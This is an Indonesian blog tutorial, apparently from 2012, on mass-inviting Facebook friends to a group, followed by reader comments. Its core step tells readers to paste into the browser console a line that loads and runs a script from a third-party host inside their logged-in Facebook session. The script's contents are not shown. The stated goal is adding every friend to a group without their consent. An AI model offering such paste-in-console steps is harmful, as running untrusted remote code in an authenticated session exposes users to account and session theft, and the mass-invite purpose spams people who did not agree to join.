Auto Invite Group Facebook | Cara Cepat Menambahkan Teman Ke Grup Facebook

Auto Invite Group Facebook | Cara Cepat Menambahkan Teman Ke Grup Facebook - Kini blog Tutorial Blogz bakalan ngeshare tentang Auto Invite Group Facebook | Cara Cepat Menambahkan Teman Ke Grup Facebook. Jika anda sedang ingin menambahkan banyak teman facebook anda ke grup anda, pasti anda ingin cepat kan? masa kalau nambahnya satu persatu nanti malah kelamaan.. maka dari itu saya share Cara Cepat Menambahkan Teman Ke Grup Facebook. Meskipun cara ini sudah jadul, tapi kan tidak ada salahnya untuk mencoba, bukan?



Auto Invite Group Facebook | Cara Cepat Menambahkan Teman Ke Grup Facebook
:

1. Buka Facebook Anda
2. Masuk ke grup yang ingin ditambahkan teman.
3. Klik Ctrl + Shift + K 
4. Masukkan kode berikut ini dikotak kecil dibawah.

document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/721141821910/auto-invite-bytutorialblogz.txt.js';

Auto Invite Group
 
5. Lalu tekan Enter.
6. Tunggulah hingga proses selesai.


Auto Invite Group 

7. Bila sudah selesai, nanti ada tulisan Close... yaudah klik tuh.. :D

Auto Invite Group


8. Refresh atau Reload ulang halaman grup, dan lihat perubahannya..!! semua teman anda langsung ke add semuanya.. WOW banget kan?

Auto Invite Group

9. Selesai deh.

Cukup mudah bukan?

#SemogaBerhasiL

Previous
Next Post »

10 komentar

Write komentar
Saiful Anasz
AUTHOR
October 29, 2012 at 4:37 PM Delete

Artikelnya Bermanfaat Sekali Sobb..

Makasih Ya...

Jgn Lupa Mampir Di Blog Ane Juga...

Klik Disini..

Salam Bloggers/Blogwalking

Reply
avatar
December 15, 2012 at 3:04 PM Delete

Sob, kalo biar banyak yang like di fans page kita gimana caranya?
Tolong ya Sobat, soalnya trik yang dishare kebanyakan udah g bisa di pake lagi,,

Segera posting ya Sob,, Aku tunggu.

Reply
avatar
Hendry GeoRge
AUTHOR
January 12, 2013 at 8:11 AM Delete

thanks again mas brow

Kunjung Balik :
http://hendrygeorge.com

Reply
avatar
Anonymous
AUTHOR
January 13, 2013 at 1:37 PM Delete

:guitarst:

Reply
avatar
blog
AUTHOR
January 27, 2013 at 10:25 PM Delete

makasih sob tips nya

Reply
avatar
TITO RISKIMAN
AUTHOR
January 30, 2013 at 2:48 AM Delete

http://bloggeronecu.blogspot.com/2012/03/kandangan-tv-online.html

Reply
avatar
January 30, 2013 at 5:59 AM Delete

Mantep deh...
Sangat bermanfaat

Reply
avatar
CippyShop
AUTHOR
April 3, 2013 at 11:48 PM Delete

udh gak work gan... xV

Reply
avatar

Silahkan tinggalkan komentar Anda di bawah ini,
Adapun peraturan berkomentar di blog ini :

1. Tidak menempatkan link hidup saat berkomentar.
2. Tidak komentar spam.
3. Tidak komentar promosi.
4. Tidak komentar yang mengandung unsur SARA.
5. Berkomentar dengan Sopan.

Tidak mematuhi peraturan? Maaf, komentar anda tidak akan saya terbitkan! EmoticonEmoticon